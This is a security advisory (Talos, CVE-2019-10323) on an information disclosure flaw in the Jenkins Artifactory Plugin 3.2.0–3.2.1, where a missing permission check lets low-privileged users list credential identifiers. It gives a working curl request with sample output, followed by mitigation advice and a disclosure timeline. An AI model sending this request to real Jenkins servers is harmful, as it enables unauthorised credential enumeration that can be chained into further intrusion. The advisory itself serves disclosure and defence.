Talos Vulnerability Report

TALOS-2019-0846

Jenkins Artifactory Plugin fillCredentialsIdItems information disclosure vulnerability

June 4, 2019
CVE Number

CVE-2019-10323

Summary

An exploitable information disclosure vulnerability exists in the fillCredentialsIdItems endpoint of the Jenkins Artifactory Plugin 3.2.0 and 3.2.1. As a result of this vulnerability a crafted HTTP request from a user with Overall/Read permissions - such as an anonymous user, if enabled - can cause affected versions of this plugin to disclose credential identifiers from the Jenkins credentials database.
The result of this vulnerability is low level information disclosure which may be used in conjunction with previously reported vulnerabilities; such as those covered in TALOS-2019-0787.

Tested Versions

Jenkins Artifactory Plugin 3.2.1 Jenkins Artifactory Plugin 3.2.0

Product URLs

https://www.jfrog.com/confluence/display/RTF/Jenkins+Artifactory+Plug-in https://github.com/jenkinsci/artifactory-plugin

CVSSv3 Score

4.3 - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-285: Improper Authorization

Details

The Jenkins Artifactory Plugin brings Artifactory's Build Integration support to Jenkins.

This vulnerability exists in the fillCredentialsIdItems endpoint exposed by the doFillCredentialsIdItems method of org.jfrog.hudson.ArtifactoryBuilder due to missing Jenkins permissions check. The result of this vulnerability is low level information disclosure. This information may be useful for an attacker as it may be used in conjunction with additional vulnerabilities in this, or other, Jenkins plugins (see TALOS-2019-0787).

# List username / password credentials on target Jenkins instance.
$ curl -s -X GET -G \
    -d 'pretty=true' \
    'http://jenkins.docker.local:8080/descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems'
{
    "_class": "com.cloudbees.plugins.credentials.common.StandardListBoxModel",
    "values": [
        {
            "name": "- none -",
            "selected": false,
            "value": ""
        },
        {
            "name": "BBBBBB/****** (ExampleOnly)",
            "selected": false,
            "value": "01e367ef-54fb-4da0-8044-5112935037bb"
        },
        {
            "name": "SecureUsername/****** (Credentials for X)",
            "selected": false,
            "value": "287fcbe2-177e-4108-ac58-efdc0a507376"
        }
    ]
}

Mitigation

Until such time that the vendor produces a patched version, this plugin should be disabled (if possible), or unnecessary users with Overall/Read permissions removed (such as anonymous access).

Credit

Discovered by Peter Adkins of Cisco Umbrella.

Timeline

2019-03-12 - Vendor Disclosure
2019-05-28 - Vendor Patched
2019-06-04 - Public Release

Credit

Discovered by Peter Adkins of Cisco Umbrella.